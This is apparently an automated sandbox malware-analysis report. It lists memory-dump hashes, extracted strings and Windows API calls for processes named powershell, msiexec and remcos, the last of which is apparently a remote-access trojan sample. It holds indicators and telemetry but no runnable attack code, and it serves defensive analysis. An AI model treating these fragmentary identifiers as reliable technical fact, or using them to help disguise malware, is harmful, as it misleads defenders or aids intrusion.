                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b572fde811b4b172b924e4784bed8a48dd079489fa5e359000ddf44c3c18792
                                                                • Instruction ID: 549fb7548e5f8cf6ca6885370a8ab05b34a1f45048179ac7222a5059ba851391
                                                                • Opcode Fuzzy Hash: 1b572fde811b4b172b924e4784bed8a48dd079489fa5e359000ddf44c3c18792
                                                                • Instruction Fuzzy Hash: DB0147367303158BD7909A6A9820A76F79ADFD1226F15C43BF785C6A42DA32C981C7A0
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bc4d4530800d6d3d7c8a61e1e7484ce76dc195e0279f1dcf2857261011cb8403
                                                                • Instruction ID: 2cc91ac051710dcef24e5deebb85919e2616fad5e160fb31c0b314180c744cd6
                                                                • Opcode Fuzzy Hash: bc4d4530800d6d3d7c8a61e1e7484ce76dc195e0279f1dcf2857261011cb8403
                                                                • Instruction Fuzzy Hash: 0011F530C82598CFDF26FAA8D9987ECB772AF4031AF142429E501B6190EB7458C9CF15
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0cbf0697a7fe9d3c36611ae63471fa4287a1ca60526399f4e98bd9a64bb3e2d4
                                                                • Instruction ID: 03a00ec213e6523baf3ab8118878ebe0715ed3515cfa15d785f36a01ce0717be
                                                                • Opcode Fuzzy Hash: 0cbf0697a7fe9d3c36611ae63471fa4287a1ca60526399f4e98bd9a64bb3e2d4
                                                                • Instruction Fuzzy Hash: B7014F31A00209DFCB14DF98D8809ADF7B2FF89324B208268D519A7A55C732AC91CB90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (fMl$(fMl$(fMl$(fMl$(fMl$(fMl$(fMl$(fMl
                                                                • API String ID: 0-3585264056
                                                                • Opcode ID: 6dde22e6508ff072705dc0f8b39ed30bfcd02ada0d1d31a596fd451952a6d167
                                                                • Instruction ID: bbb2675a14d329bc9d4d31bd2ab61f81cf064c80bbf3251d216b2c702babf114
                                                                • Opcode Fuzzy Hash: 6dde22e6508ff072705dc0f8b39ed30bfcd02ada0d1d31a596fd451952a6d167
                                                                • Instruction Fuzzy Hash: 15C19F31F10304CBEB60DF54C861E6AB7B2AF89718F24952DDA06AB344DB72EC45CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (fMl$(fMl$(fMl$(fMl$4Jl$4Jl$tL?k
                                                                • API String ID: 0-2571295508
                                                                • Opcode ID: 842dd4540365a6c4c696c9f18281a4abbc1b5f6b158fb1131e1f2d4996b0fbf2
                                                                • Instruction ID: b1db5d62cf233b81bb327002de3b372ed22a0fe990725877b9739ea5b46be5cf
                                                                • Opcode Fuzzy Hash: 842dd4540365a6c4c696c9f18281a4abbc1b5f6b158fb1131e1f2d4996b0fbf2
                                                                • Instruction Fuzzy Hash: DD619E34B10304AFE754DB68C451EAABBF2AF89314F149469D605AB364DB72FC42CB92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (fMl$(fMl$x.>k$->k
                                                                • API String ID: 0-2368651522
                                                                • Opcode ID: be4461b7f0e55c92f62ba97c33e53738bf74a58e64500c7488baf996abf04763
                                                                • Instruction ID: 85afb53a5bab23d43060aee729cf36d31f6df3288c9684323265254a9afe3d7b
                                                                • Opcode Fuzzy Hash: be4461b7f0e55c92f62ba97c33e53738bf74a58e64500c7488baf996abf04763
                                                                • Instruction Fuzzy Hash: 1AC19A30E10304DFEB24DF54C851FAEBBB2AF88308F119919EA152F744DB76A842CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (fMl$(fMl$(fMl$(fMl
                                                                • API String ID: 0-1143902458
                                                                • Opcode ID: 54f46c55fa5e635d37b38c2be393fe6609b46166f65acff8008b0280461ab7f2
                                                                • Instruction ID: 952d56751c6efeec301a9449f5bcaf05a386128fc9a2acb42981a8b904ce56b3
                                                                • Opcode Fuzzy Hash: 54f46c55fa5e635d37b38c2be393fe6609b46166f65acff8008b0280461ab7f2
                                                                • Instruction Fuzzy Hash: 74A18B31E20300DFEBA0DF54C851EAAB7B2AF88718F24992DDA156B345D772E845CB90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (fMl$(fMl$4Jl$tL?k
                                                                • API String ID: 0-3379376695
                                                                • Opcode ID: bd2bc56e4551a8058d39543a0204b2e05d12865bbeec5ff8c2f5c84b7afa79a9
                                                                • Instruction ID: f4c90a11c2186cf2ddd59347a27df61f051f949005aa2e1417d4cf16f59702ee
                                                                • Opcode Fuzzy Hash: bd2bc56e4551a8058d39543a0204b2e05d12865bbeec5ff8c2f5c84b7afa79a9
                                                                • Instruction Fuzzy Hash: F561BE34B10301EFE754CF64C851EAABBB2AF85314F15946AE514AB361DB72FC42CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (fMl$(fMl$(fMl$(fMl
                                                                • API String ID: 0-1143902458
                                                                • Opcode ID: 657ce33b98585d51498c4d18c919ddc1b0845a4eed011504de4bee3d8bc421d8
                                                                • Instruction ID: e2a027d0139923c9c8cfff19aaf03d494701345120fe6221cea6f36b376b5f65
                                                                • Opcode Fuzzy Hash: 657ce33b98585d51498c4d18c919ddc1b0845a4eed011504de4bee3d8bc421d8
                                                                • Instruction Fuzzy Hash: 41718C70F10204DFEB54DF58D855EAEBBB2AF89314F159169EA05AB350CB32EC42CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000003.2717481925.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, Offset: 00CB7000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_3_cb7000_msiexec.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0 @$p&@$q$x!@$%@
                                                                • API String ID: 0-3661044626
                                                                • Opcode ID: 4267e95cef9670ac61248a0dfcc296b8c6e7851a6d18970dc35d483d78ef2582
                                                                • Instruction ID: f65c000caeadb51f2e682547f3e8e7d5e9d35188980d95f0b0e5f53ad1514e64
                                                                • Opcode Fuzzy Hash: 4267e95cef9670ac61248a0dfcc296b8c6e7851a6d18970dc35d483d78ef2582
                                                                • Instruction Fuzzy Hash: 56E2DE71508341DFD720DF64C984BEAB7E5FB88314F10492EF5AAA72A0EB708E45CB56
                                                                APIs
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00CBF7DE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000003.2717481925.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, Offset: 00CB7000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_3_cb7000_msiexec.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritable
                                                                • String ID: csm$csm
                                                                • API String ID: 3104724169-3733052814
                                                                • Opcode ID: 5676ca9d3d157a10ce3569c92175484d4aadc39067b91ee8d714da97257d8839
                                                                • Instruction ID: fcf52b1b87d45ce0c75a1ce64744da39f4cc2322c251109e198075379fb9b056
                                                                • Opcode Fuzzy Hash: 5676ca9d3d157a10ce3569c92175484d4aadc39067b91ee8d714da97257d8839
                                                                • Instruction Fuzzy Hash: 27514F35900209ABCF14DF69CC849DE7BB6AF45325F1481B9EC24AB3A1DB31DE52CB91

                                                                Execution Graph

Execution Coverage: 8.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 34.5%
Total number of Nodes: 994
Total number of Limit Nodes: 21
388665 2 API calls 3950->3951 3951->3955 3952 3854a7 3953 3886b2 GlobalFree 3952->3953 3954 3855a9 3953->3954 3956 3895e0 4 API calls 3954->3956 3955->3952 3957 3854da CoInitialize 3955->3957 3958 3855b8 3956->3958 3957->3952 3959 3854fb LoadLibraryExW 3957->3959 3960 38551b GetLastError 3959->3960 3961 38550b SetCurrentDirectoryW 3959->3961 3962 385530 SetThreadToken 3960->3962 3963 385527 3960->3963 3961->3960 3961->3962 3964 38553e GetLastError 3962->3964 3965 38554a 3962->3965 3963->3962 3964->3965 3966 385557 GetProcAddress 3965->3966 3970 385571 3965->3970 3967 385565 GetLastError 3966->3967 3966->3970 3967->3970 3968 38558c FreeLibrary 3969 385593 CoUninitialize 3968->3969 3969->3952 3970->3968 3970->3969
                                                                APIs
                                                                • GetVersionExW.KERNEL32(?), ref: 00386434
                                                                • GetCurrentProcess.KERNEL32(0000001A,?,00000004,00000000), ref: 00386456
                                                                • NtQueryInformationProcess.NTDLL ref: 0038645D
                                                                • GetCommandLineW.KERNEL32 ref: 0038649F
                                                                • GetStdHandle.KERNEL32(000000F5), ref: 003864F3
                                                                • GetFileType.KERNEL32(00000000), ref: 00386504
                                                                • memset.MSVCRT ref: 0038652B
                                                                • memset.MSVCRT ref: 0038653D
                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0038661D
                                                                • RegCloseKey.ADVAPI32(?,?), ref: 00386649
                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00386672
                                                                • RegCloseKey.ADVAPI32(?), ref: 0038667E
                                                                • CompareStringW.KERNEL32(00000409,?,00000002,?,00381994,000000FF), ref: 003868CA
                                                                • CompareStringW.KERNEL32(00000409,00000001,00000002,?,package,?), ref: 003868F9
                                                                • CompareStringW.KERNEL32(00000409,00000001,00000002,?,003817F0,000000FF), ref: 003869BB
                                                                • memset.MSVCRT ref: 00386B2C
                                                                • GlobalFree.KERNEL32(?), ref: 00386BA4
                                                                • lstrlenW.KERNEL32(?,00000063,?), ref: 00386C69
                                                                • GlobalFree.KERNEL32(00000000), ref: 00386F6C
                                                                • CoInitialize.OLE32(00000000), ref: 003870D8
                                                                • CoRegisterClassObject.OLE32(003825E0,0038B064,00000004,00000001,0038C6AC), ref: 0038710F
                                                                • GetCurrentThread.KERNEL32 ref: 00387225
                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 0038722C
                                                                • GetLastError.KERNEL32 ref: 0038723F
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00387CAE
                                                                • TranslateMessage.USER32(?), ref: 00387CD0
                                                                • DispatchMessageW.USER32(?), ref: 00387CDE
                                                                Strings
                                                                • update, xrefs: 00386705
                                                                • ServerMain (CA): Connect to remote object failed., xrefs: 003877F8
                                                                • MSIPATCHREMOVE=, xrefs: 00386774
                                                                • ServerMain (CA): Connection to Service failed., xrefs: 0038769B
                                                                • ServerMain (CA): Error: icacContext in CA server should be AISImpersonated but is not any impersonated type, xrefs: 00387460
                                                                • ServerMain (CA): Wrong command line, xrefs: 003871D0
                                                                • OpenProcessToken failed with %d, xrefs: 003873F1
                                                                • ServerMain (CA): Could not open synchronization handle., xrefs: 003877BB, 00387ABF
                                                                • ServerMain (CA): Impersonation token not saved., xrefs: 003878DD
                                                                • log, xrefs: 0038684E
                                                                • package, xrefs: 00386767, 00386795, 003868E8
                                                                • /qb!- REBOOTPROMPT=S, xrefs: 003867E1
                                                                • ServerMain (CA): Create Custom Action Server failed., xrefs: 003876CD
                                                                • quiet, xrefs: 003867B8
                                                                • RUVEH?IJDqXFAtPYZlgmnc, xrefs: 00386BDC, 00386DB3, 00386FDC
                                                                • help, xrefs: 0038679A
                                                                • REBOOT=ReallySuppress, xrefs: 003867FF
                                                                • q, xrefs: 00386AFA
                                                                • ServerMain (CA): Error: icacContext in CA server should be EEUI but is not any impersonated type, xrefs: 0038742F
                                                                • ServerMain (CA): CoInitializeSecurity failed, xrefs: 003875F7
                                                                • norestart, xrefs: 003867F4
                                                                • ServerMain (CA): Access to token failed, xrefs: 00387250
                                                                • Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries, xrefs: 003865D9
                                                                • ServerMain (CA): Error: Access to SD, xrefs: 003874C5
                                                                • ServerMain (CA): Error: Format SD, xrefs: 003875AC
                                                                • uninstall, xrefs: 00386715
                                                                • ServerMain (CA): Wait on synchronization event failed, xrefs: 003872E1
                                                                • /l*, xrefs: 00386859
                                                                • promptrestart, xrefs: 00386830
                                                                • passive, xrefs: 003867D6
                                                                • forcerestart, xrefs: 00386812
                                                                • ServerMain (CA): Error: Watch for change-of-owning-process signal, xrefs: 0038764A
                                                                • ServerMain (CA): Process not registered with service., xrefs: 00387788
                                                                • REBOOT=Force, xrefs: 0038681D
                                                                • REBOOTPROMPT="", xrefs: 0038683B
                                                                • PATCH=, xrefs: 00386710
                                                                • ServerMain (CA): Error: Watch for the shutdown signal, xrefs: 00387621
                                                                • ServerMain (CA): Parsing command line failed, xrefs: 003871E1
                                                                • /qn, xrefs: 003867C3
                                                                • OLEAUT32.dll, xrefs: 003870DE
                                                                • ServerMain (CA): Open synchronization event failed, xrefs: 00387C8E
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: CompareMessageQueryStringmemset$CloseCurrentFreeGlobalProcessThreadValue$ClassCommandDispatchErrorFileHandleInformationInitializeLastLineObjectOpenRegisterTokenTranslateTypeVersionlstrlen
                                                                • String ID: /l*$/qb!- REBOOTPROMPT=S$/qn$MSIPATCHREMOVE=$OLEAUT32.dll$OpenProcessToken failed with %d$PATCH=$REBOOT=Force$REBOOT=ReallySuppress$REBOOTPROMPT=""$RUVEH?IJDqXFAtPYZlgmnc$ServerMain (CA): Access to token failed$ServerMain (CA): CoInitializeSecurity failed$ServerMain (CA): Connect to remote object failed.$ServerMain (CA): Connection to Service failed.$ServerMain (CA): Could not open synchronization handle.$ServerMain (CA): Create Custom Action Server failed.$ServerMain (CA): Error: Access to SD$ServerMain (CA): Error: Format SD$ServerMain (CA): Error: Watch for change-of-owning-process signal$ServerMain (CA): Error: Watch for the shutdown signal$ServerMain (CA): Error: icacContext in CA server should be AISImpersonated but is not any impersonated type$ServerMain (CA): Error: icacContext in CA server should be EEUI but is not any impersonated type$ServerMain (CA): Impersonation token not saved.$ServerMain (CA): Open synchronization event failed$ServerMain (CA): Parsing command line failed$ServerMain (CA): Process not registered with service.$ServerMain (CA): Wait on synchronization event failed$ServerMain (CA): Wrong command line$Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries$forcerestart$help$log$norestart$package$passive$promptrestart$q$quiet$uninstall$update
                                                                • API String ID: 1475639937-2370891382
                                                                • Opcode ID: 3fc2fd4539cef3a83c5f5febf3fe966602856f0dfa2c54820175dfa09f144585
                                                                • Instruction ID: 20d3762fdb51336aeb6d87af293af6964f917860124ad73a1486c0d651e938a0
                                                                • Opcode Fuzzy Hash: 3fc2fd4539cef3a83c5f5febf3fe966602856f0dfa2c54820175dfa09f144585
                                                                • Instruction Fuzzy Hash: 49E2E1711083419FDB22EF24C845BAEB7EAFB84314F2549AEF58987290EB70DC45CB52

                                                                Control-flow Graph

                                                                APIs
                                                                • Sleep.KERNEL32(0000000A,?,00388B8F,?,?), ref: 00388AE8
                                                                • LoadLibraryW.KERNELBASE(COMCTL32,00388B8F,?,?), ref: 00388B10
                                                                • GetProcAddress.KERNEL32(?,InitCommonControlsEx), ref: 00388B2E
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProcSleep
                                                                • String ID: COMCTL32$InitCommonControlsEx
                                                                • API String ID: 188063004-472741233
                                                                • Opcode ID: 054879b734f1841aefa2758b4cc5e074dd1127a0bacdcb89069c83d9976c5686
                                                                • Instruction ID: cdb558701f11ea66c5ca808d4f73b9ca387acf7259439251de6a5cf3e19d80a3
                                                                • Opcode Fuzzy Hash: 054879b734f1841aefa2758b4cc5e074dd1127a0bacdcb89069c83d9976c5686
                                                                • Instruction Fuzzy Hash: 7CF06DB16503828BD7137B35AC18B127BECBBE5345F9504E2E900D62A0EF34C801CB60

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00389E35: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00389E62
                                                                  • Part of subcall function 00389E35: GetCurrentProcessId.KERNEL32 ref: 00389E71
                                                                  • Part of subcall function 00389E35: GetCurrentThreadId.KERNEL32 ref: 00389E7A
                                                                  • Part of subcall function 00389E35: GetTickCount.KERNEL32 ref: 00389E83
                                                                  • Part of subcall function 00389E35: QueryPerformanceCounter.KERNEL32(?), ref: 00389E98
                                                                • GetStartupInfoW.KERNEL32(?,0038A310,00000058), ref: 0038934F
                                                                • Sleep.KERNEL32(000003E8), ref: 00389384
                                                                • _amsg_exit.MSVCRT ref: 00389399
                                                                • _initterm.MSVCRT ref: 003893ED
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00389419
                                                                • exit.MSVCRT ref: 0038948F
                                                                • _ismbblead.MSVCRT ref: 003894AA
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                • String ID:
                                                                • API String ID: 836923961-0
                                                                • Opcode ID: e36377ccc17398166666426c940bb1745bda3524c9b02afb9f5084c9b1964f6e
                                                                • Instruction ID: f3b5ba5db7dd0d6b0575206153cf21bd73b0e190ae75f0cb87b660be3b56c789
                                                                • Opcode Fuzzy Hash: e36377ccc17398166666426c940bb1745bda3524c9b02afb9f5084c9b1964f6e
                                                                • Instruction Fuzzy Hash: 3941D575944314DFEB23FFA5DC157B977A9AB48760F2940DBEA42D72D0CB7088018B50

                                                                Control-flow Graph

                                                                APIs
                                                                • LdrResolveDelayLoadedAPI.NTDLL ref: 003891BD
                                                                • LoadLibraryExA.KERNEL32(?), ref: 003891E4
                                                                • GetProcAddress.KERNEL32(?,?), ref: 0038924F
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressDelayLibraryLoadLoadedProcResolve
                                                                • String ID: $
                                                                • API String ID: 570722585-3993045852
                                                                • Opcode ID: bdaad498d193ab6fd9aa5ef411cfdd7aa43596721333609fb9de55c108dd4335
                                                                • Instruction ID: af9adeced1704559446249ac4e5a7bc6bdd93cdb8d4bd264863f4592afbb19a7
                                                                • Opcode Fuzzy Hash: bdaad498d193ab6fd9aa5ef411cfdd7aa43596721333609fb9de55c108dd4335
                                                                • Instruction Fuzzy Hash: 5B315571900319EFCF16DFA9C844BAEBBB9EF48754F18849AE805EB250D7319D01CB90

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0038878A: GlobalAlloc.KERNELBASE(00000040,00000000,00000000,00000001,00000000,?,00385E28,00000100), ref: 003887A2
                                                                  • Part of subcall function 0038878A: GlobalFree.KERNEL32(?), ref: 003887C0
                                                                • GetModuleFileNameW.KERNEL32(?,00000104,00000104,?,?,00001388,?,0038A2B0,000000A8,00386E7E,00000000,00000000,?), ref: 00384457
                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,?,00001388,?,0038A2B0,000000A8,00386E7E,00000000,00000000,?), ref: 003844E0
                                                                • GlobalFree.KERNEL32(?), ref: 0038450F
                                                                • GlobalFree.KERNEL32(?), ref: 00384590
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloc$FileModuleName
                                                                • String ID: %d.%d.%.4d.%d
                                                                • API String ID: 906160587-3399825337

                                                                 Control-flow Graph
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,?,00001388,?,0038A2B0,000000A8,00386E7E,00000000,00000000,?), ref: 003844E0
                                                                • GlobalFree.KERNEL32(?), ref: 0038450F
                                                                • GlobalFree.KERNEL32(?), ref: 00384590
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloc
                                                                • String ID: %d.%d.%.4d.%d
                                                                • API String ID: 1780285237-3399825337

                                                                 Control-flow Graph
                                                                APIs
                                                                • Sleep.KERNEL32(0000000A), ref: 00388C1F
                                                                • GetProcAddress.KERNEL32(?), ref: 00388C68
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressProcSleep
                                                                • String ID: VERSION
                                                                • API String ID: 1175476452-2153328089

                                                                 Control-flow Graph
                                                                APIs
                                                                  • Part of subcall function 00388BFD: Sleep.KERNEL32(0000000A), ref: 00388C1F
                                                                  • Part of subcall function 00388BFD: GetProcAddress.KERNEL32(?), ref: 00388C68
                                                                • GetFileVersionInfoW.KERNELBASE ref: 00388D03
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressFileInfoProcSleepVersion
                                                                • String ID: GetFileVersionInfoW
                                                                • API String ID: 3824450226-2839375084

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00387D1B: SetProcessMitigationPolicy.KERNEL32(00000000,?,00000008,?,?,?,00387D64,0038A2D0,00000024,00389480,00380000,00000000,00000002,0000000A), ref: 00387D39
                                                                  • Part of subcall function 003863E3: GetVersionExW.KERNEL32(?), ref: 00386434
                                                                  • Part of subcall function 003863E3: GetCurrentProcess.KERNEL32(0000001A,?,00000004,00000000), ref: 00386456
                                                                  • Part of subcall function 003863E3: NtQueryInformationProcess.NTDLL ref: 0038645D
                                                                  • Part of subcall function 003863E3: GetCommandLineW.KERNEL32 ref: 0038649F
                                                                  • Part of subcall function 003863E3: GetStdHandle.KERNEL32(000000F5), ref: 003864F3
                                                                  • Part of subcall function 003863E3: GetFileType.KERNEL32(00000000), ref: 00386504
                                                                  • Part of subcall function 003863E3: memset.MSVCRT ref: 0038652B
                                                                  • Part of subcall function 003863E3: memset.MSVCRT ref: 0038653D
                                                                • ExitProcess.KERNEL32 ref: 00387DC9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Process$memset$CommandCurrentExitFileHandleInformationLineMitigationPolicyQueryTypeVersion
                                                                • String ID:
                                                                • API String ID: 3041573362-3916222277

                                                                 Control-flow Graph
                                                                APIs
                                                                  • Part of subcall function 00388BFD: Sleep.KERNEL32(0000000A), ref: 00388C1F
                                                                  • Part of subcall function 00388BFD: GetProcAddress.KERNEL32(?), ref: 00388C68
                                                                • GetFileVersionInfoSizeW.KERNELBASE ref: 00388CBD
                                                                Strings
                                                                • GetFileVersionInfoSizeW, xrefs: 00388C9A
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
